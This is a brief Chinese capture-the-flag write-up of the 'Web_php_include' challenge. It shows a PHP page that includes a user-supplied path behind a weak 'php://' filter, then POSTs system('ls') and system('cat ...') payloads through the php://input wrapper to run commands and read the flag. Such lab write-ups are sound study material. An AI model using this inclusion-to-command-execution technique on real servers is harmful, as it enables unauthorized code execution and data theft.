Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
Pure_White_Sword1 天前
bugku-reverse题目-游戏过关
游戏·网络安全·ctf·reverse·逆向工程
闲人编程2 天前
SQLAlchemy 2.0核心概念与异步支持
数据库·后端·python·web·异步·sqlalchemy
Jerry_Gao9212 天前
【CTF】一道非常精彩的CTF题目之 SSRF + CRLF + Python反序列化组合漏洞利用
python·web安全·网络安全·ctf·ssrf·crlf
cuber膜拜2 天前
Streamlit完整教程,从基础到进阶
前端·python·web·streamlit
莓有烦恼吖3 天前
基于AI图像识别与智能推荐的校园食堂评价系统研究 08-通知功能模块
java·前端·web
unable code3 天前
内存取证-证取单简
网络安全·ctf·misc·内存取证
祁白_3 天前
CTF测试-ez_upload笔记思路 (writeup)
ctf·安全性测试·writeup
郝学胜-神的一滴3 天前
超越Tomcat的Spike (一):使用netty搭建Http服务器
java·服务器·网络·http·tomcat·netty·web
niaiheni4 天前
CTF 漏洞利用实战:五个典型案例深度解析
网络安全·php·ctf·rce
Hi202402174 天前
用Selenium实现一个免费的Web搜索API服务
前端·selenium·测试工具·web·搜索